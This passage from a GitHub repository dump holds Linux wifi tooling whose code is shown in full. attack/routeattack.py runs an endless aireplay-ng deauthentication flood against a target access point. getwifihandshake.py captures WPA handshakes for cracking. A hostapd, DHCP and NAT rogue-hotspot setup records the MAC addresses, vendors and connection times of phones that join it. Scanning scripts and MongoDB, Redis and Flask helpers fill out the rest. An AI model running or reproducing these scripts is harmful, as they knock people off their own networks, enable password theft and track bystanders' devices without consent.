"text": "ifconfig wlan1 10.0.0.1 netmask 255.255.255.0\nifconfig wlan1 mtu 1500\nroute add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1\ndhcpd -d -f -cf /etc/dhcp/dhcpd.conf wlan1\niptables -t nat -A POSTROUTING --out-interface eth0 -j MASQUERADE\necho \"1\" > /proc/sys/net/ipv4/ip_forward\n"
},
{
"alpha_fraction": 0.7706422209739685,
"alphanum_fraction": 0.8073394298553467,
"avg_line_length": 20.799999237060547,
"blob_id": "16435ec3eaa0860fc77a75b14594c0e356014ee9",
"content_id": "b07e8198eb14ca007f69b771300f98e170e7267e",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 109,
"license_type": "permissive",
"max_line_length": 23,
"num_lines": 5,
"path": "/script/getallwifi.sh",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "ifconfig wlan0 up \nairmon-ng check kill\nairmon-ng start wlan0 \nairodump-ng wlan0mon \nairmon-ng stop wlan0mon\n"
},
{
"alpha_fraction": 0.6047985553741455,
"alphanum_fraction": 0.6147578358650208,
"avg_line_length": 29.66666603088379,
"blob_id": "6e400a67fb0a7401c1d57a7d8a955077f949588c",
"content_id": "d99eeee547f3bb168888bd6d5b51164921f7f5c6",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2485,
"license_type": "permissive",
"max_line_length": 119,
"num_lines": 72,
"path": "/wifilist/startwifiserver.py",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "# coding:utf-8\nimport os\nfrom subprocess import call, Popen, PIPE\nimport time\nimport datetime\n\"\"\"\n控制扫描wifi的server服务\n执行shell脚本,kill shell,\n执行python脚本,kill py 和log\ncreate by swm 2018/01/24\n不再需要操作文件\nmodify by swm 2018/2/2\n\"\"\"\nfileDir = os.path.dirname(os.path.realpath(__file__))\n\n\nclass CONTROL:\n\n def __init__(self, seconds):\n # self.pypath = os.path.join(fileDir, 'getwifilist.py')\n self.logpath = \"/home/execute.log\"\n self.shellpath = \"/home/getallwifi.sh\"\n self.seconds = seconds\n\n # 运行python脚本抓取数据\n def collectwifilist(self, text):\n from getwifilist import WIFINAME\n wifi = WIFINAME()\n # 匹配wifi信息\n wifilist = wifi.getwifilist(text)\n # print wifilist\n # 存储已经筛选的日志信息\n wifi.startcollectinfo(wifilist)\n return\n # call(\"python {}\".format(self.pypath), shell=True)\n\n # 保存shell的所有输出\n def writeinfotolog(self):\n # call(\"python {} 2>&1 | tail -1 >{}\".format(self.infopath, self.logpath), shell=True)\n # fdout = open(self.logpath, 'a')\n # fderr = open(self.logpath, 'a')\n # 修改为不写入文件对于不是很大的字符串直接存储在内存\n p = Popen(self.shellpath, stderr=PIPE, stdout=PIPE, shell=True)\n stdout, err = p.communicate()\n return err\n\n # kill shell\n def killshell(self):\n time.sleep(self.seconds)\n call(\"ps -ef|grep airodump-ng|grep -v grep|cut -c 9-15|xargs kill -s 9\", shell=True)\n return\n\n def writelog(self, log):\n with open(self.logpath, \"a\") as file:\n file.write(log)\n file.close()\n return\n\n # 程序运行入口\n def start(self):\n self.writelog(\"{} Start scan the wifi, wait {}s\".format(datetime.datetime.now(), self.seconds))\n # 在写文件前先清除下可能存在的log\n # call(\"rm -f {}\".format(self.logpath), shell=True)\n try:\n text = self.writeinfotolog()\n except:\n log = \"{} Wifi failed to start properly, please check whether to open wlan\".format(datetime.datetime.now())\n self.writelog(log)\n # 这是非常奇怪的额,明明在写的时候不能执行下一步,但是这个确实能往后面执行\n self.writelog(\"{} Start insert to mongo.\".format(datetime.datetime.now()))\n self.collectwifilist(text)\n return\n\n"
},
{
"alpha_fraction": 0.6185935735702515,
"alphanum_fraction": 0.6221692562103271,
"avg_line_length": 34,
"blob_id": "d0a8688d7524b0819570b1981e15f8d5e3d54bed",
"content_id": "a681efca20643ecc065128ee8aa78cd4664b5e42",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 839,
"license_type": "permissive",
"max_line_length": 108,
"num_lines": 24,
"path": "/pubfunc/mongoquery.py",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "import pymongo\nimport datetime\n\n\nclass MONGO:\n def __init__(self, host, port):\n self.host = host\n self.port = port\n\n def getquerydate(self, aircarfNo):\n client = pymongo.MongoClient(host=self.host, port=self.port)\n db = client.swmdb\n eagleyedates = db.runtest\n cursor = eagleyedates.find({\"Info.fno\": aircarfNo}, {\"Info.Date\": 1}).sort(\"Info.Date\", -1).limit(1)\n for el in cursor:\n havedate = datetime.datetime.strptime(el[\"Info\"]['Date'], \"%Y-%m-%dT%H:%M:%S\").date()\n return havedate\n\n def insertintomongo(self, flightdata):\n client = pymongo.MongoClient(host=self.host, port=self.port)\n db = client.swmdb\n eagleyedates = db.runtest\n eagleyedates.insert(flightdata)\n print(datetime.datetime.now(), 'insert mongodb success')"
},
{
"alpha_fraction": 0.8547008633613586,
"alphanum_fraction": 0.8632478713989258,
"avg_line_length": 28.5,
"blob_id": "d4bbd250d51780308c1e720e1135c2b30888c7dc",
"content_id": "8e0dec7eeaac1888e48c45fceeb71661d1efd075",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 117,
"license_type": "permissive",
"max_line_length": 37,
"num_lines": 4,
"path": "/terminal/__init__.py",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "# coding:utf-8\nfrom terminal import getterminalfield\nfrom terminal import allconfig\nfrom terminal import mongooptions"
},
{
"alpha_fraction": 0.6159209609031677,
"alphanum_fraction": 0.6327716708183289,
"avg_line_length": 21.363636016845703,
"blob_id": "4900c55c6e669d6831fd85cb2f222bebc1090aa9",
"content_id": "0f8a94705887ba3a43c09d74b20d6e23ad46be2b",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1861,
"license_type": "permissive",
"max_line_length": 82,
"num_lines": 77,
"path": "/pubfunc/pubfuce.py",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "# coding:utf-8\n\"\"\"\n公用方法:\n不同时间格式转换\n去重等方法\ncreat by swm\n20180108\n\"\"\"\nimport datetime\nimport os\n# 当前文件夹的绝对路径\nfileDir = os.path.dirname(os.path.realpath(__file__))\nprint(fileDir)\n\n\nclass Student(object):\n\n @property\n def score(self):\n return self._score\n\n @score.setter\n def score(self, value):\n if not isinstance(value, int):\n raise ValueError(\"score must be an integer!\")\n if value < 0 or value > 100:\n raise ValueError(\"score must between 0~100\")\n self._score = value\n\ndef getallthefilename(directorypath):\n allfilenames = []\n for root, dirs, files in os.walk(directorypath):\n for filename in files:\n # print(filename)\n allfilenames.append(filename)\n # 修改文件名\n # os.rename(filename, newfilename)\n return allfilenames\n\n\n# 测试定时任务\ndef aspdo():\n print(\"i have a schedule\", datetime.datetime.now())\n\n\n# unixtime to 北京时间\ndef unixtimeToBjTime(nowUnixtime):\n bjtime = datetime.datetime.fromtimestamp(nowUnixtime)\n # 时间相加(例子为加10分钟)\n getonthncartime = bjtime + datetime.timedelta(minutes=10)\n return bjtime\n\n\n# 获取列表中一个元素重复的次数和位置\ndef getAllIndices(element, alist):\n \"\"\"\n Find the index of an element in a list. The element can appear multiple times.\n input: alist - a list\n element - objective element\n output: index of the element in the list\n \"\"\"\n result = []\n offset = -1\n while True:\n try:\n offset = alist.index(element, offset + 1)\n except ValueError:\n return result\n result.append(offset)\n\n\nif __name__ == '__main__':\n s = Student()\n s.score = 30\n print s.score\n s.score = 9000\n # print(getallthefilename(fileDir))"
},
{
"alpha_fraction": 0.5798165202140808,
"alphanum_fraction": 0.5981651544570923,
"avg_line_length": 22.191490173339844,
"blob_id": "705107b62cb2015440856dc583d958ad5aa85ffc",
"content_id": "a6563576fa980aac7f7b313c2ff7a2b90a44385f",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1168,
"license_type": "permissive",
"max_line_length": 95,
"num_lines": 47,
"path": "/pubfunc/getwifiinfo.py",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "# coding:utf-8\n\n\"\"\"\n获取wifi信息并写入文件\ncreate by swm 2018/1/25\n\"\"\"\n\nfrom subprocess import call\nimport datetime\nimport time\n\n\nclass INFO:\n\n def __init__(self):\n self.shellpath = \"/home/getallwifi.sh\"\n self.logpath = \"/home/wifi.log\"\n\n def startshell(self):\n # 执行脚本前先清理下log文件\n call(\"rm -rf {}\".format(self.logpath), shell=True)\n print \"start the shell\"\n # 执行脚本\n call(self.shellpath, shell=True)\n\n # kill shell\n def killshell(self):\n call(\"ps -ef|grep airodump-ng|grep -v grep|cut -c 9-15|xargs kill -s 9\", shell=True)\n\n # 结束循环后kill自己,并且删除log文件\n def killmyself(self):\n call(\"ps -ef|grep getwifiinfo.py|grep -v grep|cut -c 9-15|xargs kill -s 9\", shell=True)\n\n def strat(self):\n self.startshell()\n print datetime.datetime.now(), \"Start scan the wifi, wait 10s\"\n time.sleep(10)\n # 结束shell\n self.killshell()\n print datetime.datetime.now(), \"Have writen log to file\"\n self.killmyself()\n\n\nif __name__ == '__main__':\n print \" start\"\n info = INFO()\n info.strat()\n"
},
{
"alpha_fraction": 0.5987654328346252,
"alphanum_fraction": 0.6296296119689941,
"avg_line_length": 18,
"blob_id": "442017d4009940652acf3b9e89c8e64036e9d036",
"content_id": "cfeb1904a3e566ff58ba698a087cf3831693eef5",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 346,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 17,
"path": "/wifilist/wifiswitch.py",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "# coding:utf-8\n\n\"\"\"\n选择网卡, 更改shell脚本内容\ncreate by swm\n2018/03/12\n\"\"\"\nfrom subprocess import call\n\n\nclass SWITCH:\n\n def stopwifi(self, wlanname):\n call('airmon-ng stop {}mon'.format(wlanname), shell=True)\n call('ifconfig {} down'.format(wlanname), shell=True)\n info = {\"stoped\": 1}\n return info\n\n"
},
{
"alpha_fraction": 0.5483871102333069,
"alphanum_fraction": 0.5652605295181274,
"avg_line_length": 29.530303955078125,
"blob_id": "0d2cd971b3bcbf8922eca2c9b2ffe8ade7c4b168",
"content_id": "d9f2f8488072fc87cb03090991a37415957eaf4b",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2221,
"license_type": "permissive",
"max_line_length": 100,
"num_lines": 66,
"path": "/attack/routeattack.py",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "# coding:utf-8\n\"\"\"\n根据获得的wifi信息不断攻击目标wifi\ncreate by swm\n2018/03/23\n\"\"\"\nfrom subprocess import call, Popen, PIPE\nimport time\nimport redis\nimport re\n\nclass ATTACK:\n\n def __init__(self, mac, wlanname, ch):\n self.mac = mac\n self.wlanname = wlanname\n self.ch = ch\n\n # 选择wifi,并开启wlanmon,准备开始路由攻击\n def startwlanmon(self):\n call('ifconfig {} up'.format(self.wlanname), shell=True)\n call('airmon-ng check kill', shell=True)\n call('airmon-ng start {}'.format(self.wlanname), shell=True)\n return\n\n def changechannel(self, wlanname, ch):\n iwcmd = 'iwconfig {}mon channel {}'.format(wlanname, ch)\n call(iwcmd, shell=True)\n return\n\n def startattack(self):\n r = redis.Redis(host=\"localhost\", port=6379)\n r.hset('attack', 'statu', 1)\n attack = r.hget('attack', 'statu')\n # 在程序执行之前先改变虚拟网卡的信道\n self.changechannel(self.wlanname, self.ch)\n re_success = re.compile(r'Sending DeAuth to broadcast \\-\\- BSSID\\: \\[{}\\]'.format(self.mac))\n re_newch = re.compile(r'AP\\Wuses\\Wchannel\\W(\\d)')\n while int(attack) == 1:\n cmd = 'aireplay-ng -0 10 -a {} {}mon'.format(self.mac, self.wlanname)\n p = Popen(cmd, stdout=PIPE, stderr=PIPE, shell=True)\n out, err = p.communicate()\n # 每次都去匹配成功的字段\n success = re_success.search(out)\n if success:\n # 如果成功的化就不用理会继续执行攻击\n time.sleep(0.2)\n else:\n # 如果失败就获取当前频率并改变网卡的频率\n newch = re_newch.findall(out)\n self.changechannel(self.wlanname, newch[0])\n attack = r.hget('attack', 'statu')\n else:\n call('airmon-ng stop {}mon'.format(self.wlanname), shell=True)\n\n def start(self):\n # 1、开启airmongo\n # 2、开始进行路由攻击\n self.startwlanmon()\n self.startattack()\n return\n\n\nif __name__ == '__main__':\n attack = ATTACK('50:2B:73:F4:35:F1', 'wlan1', '3')\n attack.start()\n"
},
{
"alpha_fraction": 0.5780661106109619,
"alphanum_fraction": 0.5918794274330139,
"avg_line_length": 28.862499237060547,
"blob_id": "8a3dbaac5a1e49c995ff95162def68e455779a13",
"content_id": "8355cfc711331ac5859f8a5f8e25120a3315cb6f",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2485,
"license_type": "permissive",
"max_line_length": 88,
"num_lines": 80,
"path": "/terminal/switch.py",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "# coding:utf-8\n\n\"\"\"\n控制手机信息搜集的开关\ncreate by swm\n2018/03/06\n\"\"\"\nfrom subprocess import Popen, call\nfrom time import sleep\nimport threading\n\nfrom terminal.allconfig import conf\n\n\n\nclass WEBSWITCH:\n\n def __init__(self):\n self.hostapdshell = conf['hostapdshell']\n self.dhcpshell = conf['dhcpshell']\n self.routershell = conf['routershell']\n self.hostapdlog = conf['hostapdlog']\n self.dhcplog = conf['dhcplog']\n\n def starthostadp(self):\n fdout = open(self.hostapdlog, 'a')\n fderr = open(self.hostapdlog, 'a')\n # 修改为不写入文件对于不是很大的字符串直接存储在内存\n p = Popen(self.hostapdshell, stderr=fderr, stdout=fdout, shell=True)\n if p.poll():\n return\n return\n\n def startdhcp(self):\n fdout = open(self.dhcplog, 'a')\n fderr = open(self.dhcplog, 'a')\n p = Popen(self.dhcpshell, stderr=fderr, stdout=fdout, shell=True)\n if p.poll():\n return\n return\n\n def startrouter(self):\n p = Popen(self.routershell, shell=True)\n return\n\n def startallshell(self):\n # 开启与WiFi热点相关的所有数据\n # thread1 = threading.Thread(target=self.starthostadp)\n self.starthostadp()\n sleep(1)\n # thread2 = threading.Thread(target=self.startdhcp)\n self.startdhcp()\n sleep(1)\n # thread3 = threading.Thread(target=self.startrouter)\n self.startrouter()\n # mobi = HOSTAPD()\n # thread4 = threading.Thread(target=mobi.startcollect)\n # # mobi.startcollect()\n # thread1.start()\n # sleep(1)\n # thread2.start()\n # sleep(1)\n # thread3.start()\n # thread4.start()\n # thread1.join()\n # thread2.join()\n # thread3.join()\n # thread4.join()\n return\n\n def shutdowntheshell(self, wlanname):\n call(\"ps -ef|grep hostapd|grep -v grep|cut -c 9-15|xargs kill -s 9\", shell=True)\n call(\"ps -ef|grep dhcp|grep -v grep|cut -c 9-15|xargs kill -s 9\", shell=True)\n Popen('ifconfig {} down'.format(wlanname), shell=True)\n Popen('rm -rf {}'.format(self.hostapdlog), shell=True)\n Popen('touch {}'.format(self.hostapdlog), shell=True)\n Popen('rm -rf {}'.format(self.dhcplog), shell=True)\n Popen('touch {}'.format(self.dhcplog), shell=True)\n # call(\"ifconfig {} down\".format(wlanname), shell=True)\n return\n"
},
{
"alpha_fraction": 0.5198863744735718,
"alphanum_fraction": 0.5497159361839294,
"avg_line_length": 23.719297409057617,
"blob_id": "4b890075de1ed7412d0d13946c253ce00264c582",
"content_id": "2e56982fd95e85889bb1ffb48d596baa629f3fae",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1462,
"license_type": "permissive",
"max_line_length": 58,
"num_lines": 57,
"path": "/startcollection.py",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "# coding:utf-8\nimport threading\nimport datetime\nimport time\nfrom terminal.gethostapdfield import HOSTAPD\nclass T1:\n def thread2(self):\n count = 0\n while True:\n count += 1\n print 'swm'\n if count == 10:\n break\n return 'hello'\nclass T2:\n def thread1(self):\n count = 0\n while True:\n print 'nuonuo'\n count +=1\n if count ==20:\n break\n return 'swm'\ndef start():\n t1 = T1()\n t2 = T2()\n for i in range(0, 3):\n print datetime.datetime.now(), i\n thread1 = threading.ThreadW(target=t1.thread2)\n thread2 = threading.Thread(target=t2.thread1)\n thread1.setDaemon(1)\n thread2.setDaemon(1)\n a = thread1.start()\n b = thread2.start()\n thread2.join()\n thread1.join()\n print a\n print b\n print threading.activeCount()\n print datetime.datetime.now(), 'stop the program'\n return\nif __name__ == '__main__':\n # python多任务\n # mobi = HOSTAPD()\n # 采集手机信息的一个线程\n # thread1 = threading.Thread(target=mobi.startcollect)\n # 采集网络信息的线程\n # thread2 = threading.Thread(target=t2.start)\n # 开启线程\n # thread1.start()\n # thread1.start()\n # thread2.start()\n # thread1.join()\n # thread2.join()\n # time.sleep(5)\n print datetime.datetime.now(), 'start collect'\n start()"
},
{
"alpha_fraction": 0.5609756112098694,
"alphanum_fraction": 0.5818815231323242,
"avg_line_length": 13.350000381469727,
"blob_id": "43b33c91b44374d41c9f1622f03355460eed5c84",
"content_id": "1a0a4e8a751676b1d9399f2c9b93fa121436321d",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 321,
"license_type": "permissive",
"max_line_length": 52,
"num_lines": 20,
"path": "/attack/stopattack.py",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "# coding:utf-8\n\n\"\"\"\n结束死循环式的攻击\n反正就是结束攻击\n\"\"\"\nimport redis\n\n\nclass SHUTDOWN:\n\n def attackover(self):\n r = redis.Redis(host=\"localhost\", port=6379)\n r.hset('attack', 'statu', 0)\n return\n\n\nif __name__ == '__main__':\n shuwdown = SHUTDOWN()\n shuwdown.attackover()\n"
},
{
"alpha_fraction": 0.5423728823661804,
"alphanum_fraction": 0.6271186470985413,
"avg_line_length": 19,
"blob_id": "18a11b84746ee382242447c744131af88a27f085",
"content_id": "0617f6b1e361bae8dd066720bf2980599ea39101",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 59,
"license_type": "permissive",
"max_line_length": 27,
"num_lines": 3,
"path": "/pubfunc/config.py",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "mongo ={}\nmongo['host'] = \"localhost\"\nmongo['port'] = 27017"
},
{
"alpha_fraction": 0.579812228679657,
"alphanum_fraction": 0.6126760840415955,
"avg_line_length": 26.45161247253418,
"blob_id": "ce3c682c60b6b8191995760c6fed56ad02b79030",
"content_id": "9c15af114880578456e2214fc09a1ee25751af07",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 852,
"license_type": "permissive",
"max_line_length": 101,
"num_lines": 31,
"path": "/pubfunc/selectmingidata.py",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "# coding:utf-8\n\"\"\"\ncreate by swm\n2018/02/26\n\"\"\"\nimport pymongo\nimport datetime\nimport time\nimport json\n\n\ndef getquerydate(today):\n res = []\n client = pymongo.MongoClient(host=\"192.168.1.213\", port=27017)\n db = client.swmdb\n collection = db.wifilist\n # cursor = collection.find({\"unixtime\": {\"$gt\": int(today)}}, {\"_id\": 0}).sort({\"unixtime\": -1})\n cursor = collection.find({\"unixtime\": {\"$gt\": int(today)}}, {\"_id\": 0}).sort([(\"unixtime\", -1)])\n for el in cursor:\n havedate = datetime.datetime.fromtimestamp(int(el['unixtime'])).strftime('%Y-%m-%d %H:%M:%S')\n el['unixtime'] = havedate\n res.append(el)\n return res\n\n\nif __name__ == '__main__':\n todayunxi = time.mktime(datetime.date.today().timetuple())\n res = getquerydate(todayunxi)\n # print res\n jsondata = json.dumps(res)\n print jsondata\n\n"
},
{
"alpha_fraction": 0.8666666746139526,
"alphanum_fraction": 0.8666666746139526,
"avg_line_length": 14,
"blob_id": "10b81efc970d90bdd391a3ab6fa7236810420aef",
"content_id": "bd4cce4f2480d735b83eae21c759eef4a0a52364",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 40,
"license_type": "permissive",
"max_line_length": 18,
"num_lines": 2,
"path": "/README.md",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "# linuxdatacollect\n搜集linux的信息\n"
},
{
"alpha_fraction": 0.7053571343421936,
"alphanum_fraction": 0.7142857313156128,
"avg_line_length": 12.875,
"blob_id": "db451f403d3156fbc1292df10297c71a23203073",
"content_id": "29dbeda087d94e57cb1f764942e16d95f5a624d1",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 120,
"license_type": "permissive",
"max_line_length": 28,
"num_lines": 8,
"path": "/pubfunc/decorator.py",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "# coding:utf-8\n# 函数注册\nregistry = []\n\n\ndef register(decorated):\n registry.append(decorated)\n return decorated\n\n"
},
{
"alpha_fraction": 0.5992043614387512,
"alphanum_fraction": 0.6051715612411499,
"avg_line_length": 30.4375,
"blob_id": "cc8bb4dda921d56c0a77d97993c7af6751e119a2",
"content_id": "84d6ff9c1f547dee2f4ffc077c4fba8c0acd3ba7",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2245,
"license_type": "permissive",
"max_line_length": 128,
"num_lines": 64,
"path": "/wifilist/getwifihandshake.py",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "# coding:utf-8\nimport os\nimport subprocess\nimport redis\nimport re\n\"\"\"\n根据传入的mac,ch,wifi名去获取\nwifi handshake的握手包\ncreate by swm 2018/1/26\n\"\"\"\n\n\nfiledir = os.path.dirname(os.path.realpath(__file__))\n\n\nclass HANDSHAKE:\n\n def __init__(self, mac, ch, wifi, wlanname):\n # self.hslogpath = os.path.join(filedir, 'routrattack', 'wifihandshake.log')\n # self.logpath = \"/home/execute.log\"\n self.savedatapath = '/home/wifidata/'\n self.mac = mac\n self.ch = ch\n self.wifi = wifi\n self.wlanname = wlanname\n # 获得文件的路径\n self.wifihandshake = '/home/wifidata/{}-01.cap'.format(wifi)\n # 保存文件的路径\n self.keepfile = '/home/wifihandshakedata/'\n from terminal.allconfig import conf\n self.r = redis.Redis(host=conf['redishost'], port=conf['redisport'])\n\n # 保存shell的所有输出\n def writeinfotolog(self, cmd):\n p = subprocess.Popen(cmd, stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True)\n output, err = p.communicate()\n return err\n\n def delunusefile(self):\n subprocess.call(\"rm -f /home/wifidata/*\", shell=True)\n\n # 移动获取成功的文件\n def mvfile(self):\n subprocess.call(\"cp -frap {} {}\".format(self.wifihandshake, self.keepfile), shell=True)\n\n # 接收mac,ch, wifi获取wifihandshakebao,这个程序就只会写log知道泛洪攻击成功\n def starthandshake(self):\n # 在获取握手包前先删除以前的握手包\n self.delunusefile()\n # 开启获取wifi握手包的命令,并将log写入文件,本地获得一个文件\n cmd = 'airodump-ng -c {} --bssid {} -w {} {}mon'.format(self.ch, self.mac, self.savedatapath + self.wifi, self.wlanname)\n strdata = self.writeinfotolog(cmd)\n re_handshake = re.compile(r'WPA handshake\\:.{}'.format(self.mac))\n for line in strdata.splitlines():\n handshake = re_handshake.search(line)\n if handshake:\n GET = 1\n # 获取握手包成功后删除wifilog\n break\n else:\n GET = 0\n continue\n self.r.hset(\"handshake\", \"GET\", GET)\n return"
},
{
"alpha_fraction": 0.6370118856430054,
"alphanum_fraction": 0.6465195417404175,
"avg_line_length": 31.373626708984375,
"blob_id": "d0d38e24c9fa797c42920cab6c264e5291341378",
"content_id": "2b117f7edea47d649fee6b3bee2621407e59db99",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2969,
"license_type": "permissive",
"max_line_length": 115,
"num_lines": 91,
"path": "/locapp.py",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "# coding:utf-8\nimport threading\nfrom flask import Flask, request, Response, send_from_directory, make_response, render_template\nimport json\nimport gevent.monkey\nfrom gevent.pywsgi import WSGIServer\nimport redis\nfrom flask.ext.cors import CORS\ngevent.monkey.patch_all()\n# 内部引用\nfrom wifilist.mongoquery import getquerydate\nfrom wifilist.getwifihandshake import HANDSHAKE\nfrom wifilist.routeattack import ROUTE\napp = Flask(__name__)\nCORS(app)\n\n\[email protected]('/')\ndef root():\n return render_template('swmfile.html')\n\n\[email protected]('/api/mongodata', methods=['get'])\ndef sendmongodata():\n responsedata = getquerydate()\n return Response(responsedata, mimetype=\"application/json\")\n\n\[email protected]('/api/startcollect', methods=['post'])\ndef starttheserver():\n args = json.loads(request.data)\n # 类型强转确保int\n seconds = int(args['seconds'])\n if int(args['start']) == 1:\n # control = CONTROL(seconds)\n # thread1 = threading.Thread(target=control.start)\n # thread2 = threading.Thread(target=control.killshell)\n # thread1.start()\n # thread2.start()\n # thread1.join()\n # thread2.join()\n info = {\"complete\": 1}\n else:\n info = {\"complete\": 0, \"error\": \"something wrong with you!\"}\n response = Response(json.dumps(info), mimetype=\"application/json\")\n return response\n\n\[email protected]('/api/handshake', methods=['post'])\ndef collecthandshake():\n args = json.loads(request.data)\n open(args['wifi'], \"w+\").close()\n # handshake = HANDSHAKE(args['mac'], int(args['ch']), args['wifi'])\n # router = ROUTE(args['mac'])\n # t1 = threading.Thread(target=handshake.starthandshake)\n # t2 = threading.Thread(target=router.start)\n # t1.start()\n # t2.start()\n # t2.join()\n # t1.join()\n # from terminal.allconfig import conf\n # r = redis.Redis(host=conf['redishost'], port=conf['redisport'])\n # get = r.hget(\"handshake\", \"GET\")\n if args is not None:\n info = {\"complete\": 1}\n else:\n info = {\"complete\": 0, \"error\": \"Failed get wifi handshake\"}\n return Response(json.dumps(info), mimetype=\"application/json\")\n\n\[email protected]('/api/download/<wifi>', methods=['GET'])\ndef download(wifi):\n filepath = './'\n filename = '{}'.format(wifi)\n # 中文\n response = make_response(send_from_directory(directory=filepath, filename=filename, as_attachment=True))\n # except:\n # info = {\"complete\": 0, \"error\": \"No such file, scan wifi failed\"}\n # return Response(json.dumps(info), mimetype=\"application/json\")\n response.headers[\"Content-Disposition\"] = \"attachment; filename={}\".format(filename.encode().decode('latin-1'))\n return response\n\n\nif __name__ == '__main__':\n http_server = WSGIServer(('0.0.0.0', 8014), app)\n try:\n print(\"Start at \" + http_server.server_host +\n ':' + str(http_server.server_port))\n http_server.serve_forever()\n except(KeyboardInterrupt):\n print('Exit...')"
},
{
"alpha_fraction": 0.5403578281402588,
"alphanum_fraction": 0.547117292881012,
"avg_line_length": 33.93055725097656,
"blob_id": "8bf10b2f1e48384fe1b53311d418e9a9fa02bdc0",
"content_id": "5511774b0fba17d80f3a33e2e92ad1cf6c3c00b9",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2629,
"license_type": "permissive",
"max_line_length": 96,
"num_lines": 72,
"path": "/terminal/gethostapdfield.py",
"repo_name": "Octoberr/linuxdatacollect",
"src_encoding": "UTF-8",
"text": "# coding:utf-8\n\"\"\"\n读取hostapd的log,并且将结果缓存在redis\ncreate by swm\n2018/01/16\n\"\"\"\nimport time\nimport re\nimport redis\n\nfrom terminal.allconfig import conf\nfrom terminal import mongooptions as mongo\n\n\nclass HOSTAPD:\n\n def __init__(self):\n self.r = redis.Redis(host=conf['redishost'], port=conf['redisport'])\n\n def follw(self, thefile):\n thefile.seek(0, 2) # Go to the end of the file\n while True:\n line = thefile.readline()\n if not line:\n time.sleep(0.1)\n continue\n yield line\n\n def getmobilfactory(self, devicemac):\n dhcpfile = open(conf['dhcplog'], \"r\").read()\n re_factory = re.compile(r'{}.\\((.*?)\\)'.format(devicemac))\n factory = re_factory.findall(dhcpfile)[0]\n return factory\n\n def getthehostapdname(self):\n hostapdconffile = open(conf['hostapdconf'], \"r\").read()\n re_name = re.compile(r'\\bssid\\=(.+)')\n wifiname = re_name.findall(hostapdconffile)\n return wifiname[0]\n\n def startcollect(self):\n re_connect = re.compile(r'AP-STA-CONNECTED.(\\S+\\:\\S+\\:\\S+\\:\\S+\\:\\S+\\:\\S+)')\n re_disconnect = re.compile(r'AP-STA-DISCONNECTED.(\\S+\\:\\S+\\:\\S+\\:\\S+\\:\\S+\\:\\S+)')\n logfile = open(conf['hostapdlog'], \"r\")\n loglines = self.follw(logfile)\n for line in loglines:\n connect = re_connect.search(line)\n if connect:\n wifiname = self.getthehostapdname()\n name = connect.group(1)\n # 上线时间\n connecttime = int(time.time())\n self.r.hset(name, \"onlinetime\", connecttime)\n self.r.hset(name, \"devicemac\", name)\n self.r.hset(name, \"wifiname\", wifiname)\n continue\n disconnect = re_disconnect.search(line)\n if disconnect:\n name = disconnect.group(1)\n # 根据devicemac在dhcp.log中寻找生产产商\n factory = self.getmobilfactory(name)\n self.r.hset(name, \"factory\", factory)\n disconnecttime = int(time.time())\n # 下线时间\n self.r.hset(name, \"offlinetime\", disconnecttime)\n mobiinfo = self.r.hgetall(name)\n # 